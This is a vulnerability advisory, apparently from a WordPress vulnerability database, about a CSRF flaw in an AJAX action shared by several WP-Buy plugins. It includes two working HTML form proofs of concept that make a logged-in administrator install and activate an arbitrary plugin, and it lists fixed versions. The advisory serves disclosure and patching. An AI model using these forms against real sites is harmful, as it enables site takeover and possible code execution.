Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via CSRF
Description
The "cp_plugins_do_button_job_later_callback" AJAX action, from multiple plugins of the WP-Buy vendor, was lacking CSRF check, allowing attackers to make a logged in administrator install and active arbitrary plugins (including specific version) from the WordPress repository which could lead to more critical vulnerabilities like RCE.
Proof of Concept
Installation:
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="do_button_job_later" />
<input type="hidden" name="slug" value="wpscan.1.14.4" />
<input type="submit" name="submit" value="submit" />
</form>
</body>
</html>
Activation:
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="do_button_job_later" />
<input type="hidden" name="plugin_file" value="wpscan/wpscan.php" />
<input type="submit" name="submit" value="submit" />
</form>
</body>
</html>
Affects Plugins
Fixed in version 3.4✓
Fixed in version 1.6✓
Fixed in version 2.5✓plugin closed
Fixed in version 1.9✓plugin closed
Fixed in version 3.1✓plugin closed
Fixed in version 2.13✓
Fixed in version 3.1✓
Fixed in version 2.1✓
Classification
Miscellaneous
Timeline
Publicly Published
2021-04-22 (about 9 months ago)
Added
2021-04-22 (about 9 months ago)
Last Updated
2021-04-22 (about 9 months ago)